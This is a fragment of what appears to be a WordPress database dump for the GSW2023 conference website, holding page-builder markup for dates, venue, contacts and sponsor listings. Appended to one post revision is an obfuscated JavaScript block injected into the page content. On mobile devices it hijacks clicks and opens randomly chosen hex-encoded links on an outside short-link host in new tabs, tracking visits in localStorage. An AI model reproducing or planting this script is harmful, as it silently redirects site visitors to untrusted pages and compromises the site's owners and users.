!important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-14 10:54:11','2023-06-14 10:54:11','',3066,'https://gsw2023.com/?p=4704',0,'revision','',0),
(4705,1,'2023-06-14 14:35:28','2023-06-14 14:35:28','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]\r\n\r\n<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" />\r\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner 